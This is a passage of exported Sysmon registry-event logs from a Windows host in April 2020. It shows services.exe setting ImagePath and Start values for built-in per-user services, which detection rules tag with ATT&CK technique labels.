11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 11:01:13.954",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.751631700Z"",""eventRecordID"":""919"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:13.947",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.750473200Z"",""eventRecordID"":""918"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_376ac\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 11:01:13.921",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.750160000Z"",""eventRecordID"":""917"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:13.722",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.748722900Z"",""eventRecordID"":""916"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 11:01:13.448",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.747433700Z"",""eventRecordID"":""915"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:13.432",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.746245600Z"",""eventRecordID"":""914"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:13.388",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.745948600Z"",""eventRecordID"":""913"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_376ac\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 11:01:13.359",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.738294800Z"",""eventRecordID"":""912"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 11:01:13.241",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.737609100Z"",""eventRecordID"":""911"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:13.174",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.736540700Z"",""eventRecordID"":""910"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 11:01:13.000",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.736236200Z"",""eventRecordID"":""909"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:12.867",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.703160900Z"",""eventRecordID"":""908"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 11:01:12.731",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.702285800Z"",""eventRecordID"":""907"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:12.701",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.701037800Z"",""eventRecordID"":""906"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 11:01:12.680",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.700226400Z"",""eventRecordID"":""905"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.520\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.520"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.520 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:12.661",9,"ATT&CK T1058:Registry edit for new 